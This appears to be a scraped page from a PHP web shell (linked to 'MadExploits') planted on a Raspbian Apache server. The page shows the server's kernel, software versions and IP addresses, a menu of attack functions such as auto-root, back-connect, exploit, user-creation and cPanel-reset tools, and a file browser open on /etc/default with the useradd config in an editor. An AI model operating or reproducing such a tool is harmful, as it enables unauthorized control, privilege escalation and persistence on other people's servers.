Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
default /
[ HOME SHELL ]
Name
Size
Permission
Action
apache-htcacheclean
556
B
-rw-r--r--
avahi-daemon
219
B
-rw-r--r--
bluetooth
845
B
-rw-r--r--
bsdmainutils
222
B
-rw-r--r--
cacerts
384
B
-rw-------
console-setup
276
B
-rw-r--r--
crda
549
B
-rw-r--r--
cron
955
B
-rw-r--r--
dbus
297
B
-rw-r--r--
exim4
1014
B
-rw-r--r--
fake-hwclock
84
B
-rw-r--r--
hwclock
657
B
-rw-r--r--
keyboard
150
B
-rw-r--r--
locale
92
B
-rw-r--r--
networking
1.01
KB
-rw-r--r--
nfs-common
793
B
-rw-r--r--
nginx
389
B
-rw-r--r--
nss
1.71
KB
-rw-r--r--
raspberrypi-kernel
292
B
-rw-r--r--
rng-tools
717
B
-rw-r--r--
rpi-eeprom-update
34
B
-rw-r--r--
rsync
2.01
KB
-rw-r--r--
rsyslog
124
B
-rw-r--r--
saned
110
B
-rw-r--r--
ssh
133
B
-rw-r--r--
triggerhappy
548
B
-rw-r--r--
useradd
1.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : useradd
# Default values for useradd(8) # # The SHELL variable specifies the default login shell on your # system. # Similar to DHSELL in adduser. However, we use "sh" here because # useradd is a low level utility and should be as general # as possible SHELL=/bin/bash # # The default group for users # 100=users on Debian systems # Same as USERS_GID in adduser # This argument is used when the -n flag is specified. # The default behavior (when -n and -g are not specified) is to create a # primary user group with the same name as the user being added to the # system. # GROUP=100 # # The default home directory. Same as DHOME for adduser # HOME=/home # # The number of days after a password expires until the account # is permanently disabled # INACTIVE=-1 # # The default expire date # EXPIRE= # # The SKEL variable specifies the directory containing "skeletal" user # files; in other words, files such as a sample .profile that will be # copied to the new user's home directory when it is created. SKEL=/etc/skel # # Defines whether the mail spool should be created while # creating the account # CREATE_MAIL_SPOOL=yes
Close